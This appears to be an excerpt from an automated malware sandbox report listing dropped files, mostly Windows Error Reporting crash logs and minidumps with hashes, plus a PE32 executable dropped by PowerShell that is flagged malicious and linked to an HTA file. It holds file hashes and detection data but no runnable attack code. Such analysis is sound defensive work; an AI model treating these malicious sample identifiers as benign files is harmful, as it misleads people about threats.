                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.489165730083916
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYs7Ym8M4JKTJFx+q8v+Tuh0B9ned:uIjfrI7Cj67VreJIKF0B9ned
                                                                            MD5:E5669939A43B84E1DB55B0F6F2424153
                                                                            SHA1:BF5636913C1AE1CF6D3A1D6F1889F20AD0CE7F56
                                                                            SHA-256:E3A86E9D3523B700C03D7B3D9BAFB0CB525B055311C7347CF50C819F301D1A28
                                                                            SHA-512:5A0FA5FCBE96DE3E80E617659AA1CD439434D2D9AAB681DD4F9588D21D4430067F8FDFB803C5D19BEE7B33367E8F973A2FD33B995488945A8BDF774E3C3A1B8B
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:37 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62422
                                                                            Entropy (8bit):2.2329892933340934
                                                                            Encrypted:false
                                                                            SSDEEP:192:BzyuX6tlLXFkltBymO2gtg+XWtW2siiFwguBENS2PLak9j+1XLY3hyCHW764I6MB:5ynlBkltkhgcWhs9wHE5apmj6Imm
                                                                            MD5:DE319A4A3FF2AC5E9EAED05381552758
                                                                            SHA1:749E1C6F52F6F6144BC2D48C42BF0A5A3D5E9E32
                                                                            SHA-256:BEAD3FB92D7B4ADEDB001488BC29D3D8ED2A98D974F3E868F1F5AC9707EFBBA0
                                                                            SHA-512:9F0E0F6B3316212D00FFB7A5F487A755240C908B4960DAE114A0C56D4704E73E07E76680096A7660207F7F54BBF9957E65D7726531D9181088DD62D7E593FC01
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.716759502201914
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVB4q6Z5SQYUMaAjAbpBa89bK5sfh/um:R6lXJ8q6Z5VYdaAjAHKSfh/
                                                                            MD5:C6CE09F91AE87C2EDCF964F7AE6637C8
                                                                            SHA1:FC3E895CCE9F2DB18C51ECDE6C0918706EC63415
                                                                            SHA-256:5BFF2029CEF732ADFE72140AD75F951F9327093859F2637F4A438456789965A5
                                                                            SHA-512:90A2C5E86AD44E60D5CA37CB9394D28849460A8C99DDEA39389E3152670CC0A9384961D7304A5EE385888A4862E119D88D379368B04398AF6B881EEB4A67E481
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.486491156732046
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VY7Ym8M4JKTBFHZ+q8v+TGh0B9ned:uIjfrI7Cj67VDJ0ZKt0B9ned
                                                                            MD5:3B714C700D49C18834A423C77CC3C796
                                                                            SHA1:3C8903FAFC2DCBED9B97A8333A923C9A2F0744EE
                                                                            SHA-256:2839287998A6690C9C6A8240EB6B6C8D3F2FE240173B989FF51F13A67AFFABBA
                                                                            SHA-512:0AA75CBB42FA5D38B1C705610E3AE00DAA4F2B79C096EDC4922B6C14BEFEC2EE1BDBA8E662BDEE1C11D976D450D2B4927B86002BD7F947322F65A2360DD23025
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:38 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):63886
                                                                            Entropy (8bit):2.24701587235138
                                                                            Encrypted:false
                                                                            SSDEEP:192:GSyuX6tlLXFklt64lIEXmO2gtguyWABxG2u9sF0BqDaklr+1XLY3hyCHW767fgws:xynlBkltHlIGhgu+x+9s2Bsa9m1giq
                                                                            MD5:2CF843492A3DFA9F194E0B8701BEA714
                                                                            SHA1:3BD62144C74D29ECA311402F360794F179A0F167
                                                                            SHA-256:F0CD2AF62EAE284E3EEEEE00DF209BBED3E606948C26F98CFDA1D893D7D555C5
                                                                            SHA-512:7E654D95A1CA25332C79EA64A332DDD13CEB656EEAD1F449CCB56BD9350DD4836EBB5FCF9CD8456ADAB18072198746BF520389A277CDAA3F49CBA7A96BC2F1E4
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.7159589887659275
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBk6gsOdYUc0pB089bN5sf4avm:R6lXJg6gsUYNiNSf0
                                                                            MD5:7B270C00D39DA8FE9E6FC41AB3F0084C
                                                                            SHA1:1DE92C30DEB1CB95E8E019EA225E514D98EB486E
                                                                            SHA-256:751FD79B3BE453DBFB2C11C93ACF200925C851F6B4B0F8D0AA0942023B3C37F2
                                                                            SHA-512:25F47378628C0161870189C46FD1EB719ECA282B805B1FB04D7643EE65CB540AFBF937494916EFD0D32084BB768B4B38E62A6DB57F892295C1631913FD35A87E
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.486243817466006
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYwYm8M4JKTJFU+q8v+Tuh0B9ned:uIjfrI7Cj67V4J9KF0B9ned
                                                                            MD5:44D03F87B407847D24E4D5317B487725
                                                                            SHA1:AA4660CE4DC6318451BB1D59C6C1B5978B6E18D0
                                                                            SHA-256:67670E074CBB3ECCC3570350569AC9774648A1A4CC885007035E8ADF7B259E2B
                                                                            SHA-512:D87F1D5D41C1692F35440B4CF1E3EFC17700A4430773A83FFB62F9AFCEF9FE9D407DEDCB98D53C9FAF12031DB1F6F2D8BE00A163676760DAD1208DFA0E2D9A07
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:41 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62520
                                                                            Entropy (8bit):2.236882610582372
                                                                            Encrypted:false
                                                                            SSDEEP:384:nynlBklt3Jhga5TsEIw2aIQa9mMhB1xm8:ylB+ZhgeTIw2oar
                                                                            MD5:374D3DA345BF195A76464875482C8225
                                                                            SHA1:D37455BA21416F19A93D8EF3D2BB2C05BE0C61DD
                                                                            SHA-256:D20CE5A1018637B7DA9B8604BEB8CF7BCFCED5ED8CC85E0E127919DC6D102857
                                                                            SHA-512:FBEA8CF0FEE90255DA7ACD678F794DBC48662F71B84CF1548636AF32389E86BA61D8C0A5E67D46A753B00760C03FC5D82170E0F8CCF844132D99E6D2EAB2AB4E
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...............0...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.7160459087607443
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBx6ZsgdYUMaAjAbpBv89b75sfO9Jm:R6lXJ16ZsaYdaAjA07SfO6
                                                                            MD5:01E81DEE6F5984BFBD72E6FE850FF942
                                                                            SHA1:855ED7871C5659DBFE568490908E6DD0A1D46926
                                                                            SHA-256:CE7684B6C836C400E9F1424B8F7C97C6BDFCA8B49CE8C7BF2010C7918769F7FE
                                                                            SHA-512:628D21B87D85FD53CCF8D36E1FAB50207F1574511552D869902510D39E36FAE32599C9FAFA2F393E1A25A33BA6FD15C0E13F735B41A049401B772F7797624AC9
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.4837244799132625
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYOYm8M4JKTBF9A+q8v+TGh0B9ned:uIjfrI7Cj67VOJmAKt0B9ned
                                                                            MD5:1C897B85C7A39A106C7A4639EE49CCEF
                                                                            SHA1:816FE4F87F58A24C07F6D3DA1CBF5021B0E5D1D9
                                                                            SHA-256:1F8A8C53C240476896B97DACF97CE5DD270E2BB8F374B9E009B819B2D8FC86C0
                                                                            SHA-512:1FF308712D657E7C21950D5EC5DF2F28C93AA5D1216CC256BFC918AEB8E87952E1F60308FF032B02B3C32DC6B67A762C9B8BA8281A26879E8D45300F8D9877D3
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:41 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):63984
                                                                            Entropy (8bit):2.248389977785375
                                                                            Encrypted:false
                                                                            SSDEEP:192:NfNyuX6tlLXFkltSsmO2gtgSEyWFihsSEPb9aBn2L2TqDaklr+1XLY3hyCHW76Vh:hNynlBkltRhgLJihsSEz2nBsa9mAuMk
                                                                            MD5:D71AE8AE6DFE7E288D122B3AB378F134
                                                                            SHA1:0E214B9595183967B607943EE9EEAB29D849670F
                                                                            SHA-256:3120EF16736CBC1D62257701E49EEB5D4D36A9DF3CD7FE101678580063DD8119
                                                                            SHA-512:0AA6EB44ED9637BC9AB626BDC24894152E751C7D26CDA5C7B30A92D1846B93287026536AE985A50F5A92AAFE9987ED37B9620599FF43B712A1F26C8EA40BF5B0
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...............H...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.71714077263772
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBi65swuYUc0pBa89b75sfxwJm:R6lXJm65s5YNw7SfxD
                                                                            MD5:68961B32E5A2C5D0DD1D39D85ABA8991
                                                                            SHA1:CAFBB537CEFDF181327CF9828256449D5031DC9B
                                                                            SHA-256:58B35BFE9F88172C3A712A867AC21BD1501F6789C697FB5B13512D69A231BEF7
                                                                            SHA-512:A89338B1CF1DBF231EA66615763B983B62D943E99A6648D89572A96CD76A48494E1B8F444AFAA47C69BB3A88AB8A35C2F4C4A053A3235F7153075447854F36F0
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.485386344974945
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYgYm8M4JKTJFNGr+q8v+Tuh0B9ned:uIjfrI7Cj67VgJtrKF0B9ned
                                                                            MD5:68D728DDE3D71F2F1AA7BB8BBC6F0EB1
                                                                            SHA1:705525F9342AD48D9EC1EEDC847E4D9492D634C8
                                                                            SHA-256:BC79290F5AB80A4392590927AFA48D72565A36E07E8F2F939B0D9D9E8C2F5BB1
                                                                            SHA-512:531D5481F0DFA37CF1980E19B928AF45C371596DB1C76E7BB192CA4FF09E4EFCB15CB2A4F581A9C5143BB09094BD205E3536B461037ACBF63FD3B06369B8068A
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:46 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62716
                                                                            Entropy (8bit):2.2381024419267477
                                                                            Encrypted:false
                                                                            SSDEEP:384:ksynlBkltZFhgc/W8smwiAna9m2FEuLm:ulB+jhgce8hwPnap
                                                                            MD5:524D5E7E6A0F44A5FA264C53ED0164E8
                                                                            SHA1:C91C47C59DB9758AB3A6CD353B1483BCDD424BE1
                                                                            SHA-256:322DA73289A0CFFCE8223C91A9DC96F68558CCCBB0C9C34DA805C04B95F02E56
                                                                            SHA-512:93601B7816A9225410BD9A008F89A83E6D1F37E8E2E0B5A0FE7D9EDCE1A80473D467B3C5EA8CF8268FF4F58577E0309AFCE7D968F06B5FC787A001773263804B
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........X...............L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):540672
                                                                            Entropy (8bit):6.60558566420824
                                                                            Encrypted:false
                                                                            SSDEEP:6144:1oO3gcLssxNY5nm9zzeuQMdKNuCsXVkm4MrVGFlujcbDxnrTtF0xyOOOtwFt4rmk:1oQYsM5nm9nR81sFkTXwjcBrAbOOteQ
                                                                            MD5:A2D03C5333BFECCA62720CD6EE3A4DC4
                                                                            SHA1:CE4C380F2748F375904C17B38D4F93E294FEF4F6
                                                                            SHA-256:EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                                                                            SHA-512:5C9DB8BB415DA332C0ADC24519AE0410A65ABA932DE15A682CE57EFBC61B8B7D7E5E3548164909A5DA5BC6966C351528626655FDBB7C21F3B4FD1974406AE04C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                            Joe Sandbox View:
                                                                            • Filename: crreatedbestthingswithgreatattitudeneedforthat.hta, Detection: malicious
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G...........................`............`.......................Rich...................PE..L...a..e............................R.............@.................................t..........................................(....p..h=..................................................P8.......8..@............................................text.............................. ..`.data...........d..................@....rsrc...h=...p...>..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1510207563435464
                                                                            Encrypted:false
                                                                            SSDEEP:3:NlllulPki/llllZ:NllUcylll
